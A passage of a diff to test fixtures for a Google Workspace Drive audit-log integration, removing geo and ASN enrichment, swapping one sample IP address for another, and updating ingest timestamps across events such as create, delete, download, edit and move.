title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "add_to_folder", "id": "1", @@ -101,31 +83,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -145,7 +109,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -178,8 +142,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822595800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_canceled\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398298100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_canceled\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_canceled", "id": "1", 
@@ -200,31 +164,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -244,7 +190,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -277,8 +223,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822597600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_comment_added\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398301600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_comment_added\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_comment_added", "id": "1", 
@@ -299,31 +245,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -343,7 +271,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -376,8 +304,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822599200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_requested\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398307700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_requested\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_requested", "id": "1", 
@@ -398,31 +326,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -442,7 +352,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -475,8 +385,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822600600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_reviewer_responded\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398312700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_reviewer_responded\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_reviewer_responded", "id": "1", 
@@ -497,31 +407,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -541,7 +433,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -574,8 +466,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822602Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"create\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398317800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"create\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "create", "id": "1", 
@@ -594,31 +486,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -638,7 +512,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -671,8 +545,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822603400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"delete\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398323600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"delete\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "delete", "id": "1", 
@@ -691,31 +565,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -735,7 +591,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -768,8 +624,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822604800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"download\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398329300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"download\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "download", "id": "1", 
@@ -788,31 +644,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -832,7 +670,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -865,8 +703,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822606300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"edit\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398335Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"edit\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "edit", "id": "1", 
@@ -885,31 +723,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -929,7 +749,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -962,8 +782,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822607700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"add_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398340800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "add_lock", "id": "1", 
@@ -982,31 +802,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1026,7 +828,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1063,8 +865,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822609100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"move\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", + "ingested": "2021-12-09T13:39:08.398346600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"move\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", "provider": "drive", "action": "move", "id": "1", @@ -1083,31 +885,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1127,7 +911,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1160,8 +944,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822610600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"preview\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398352600Z", + "original": 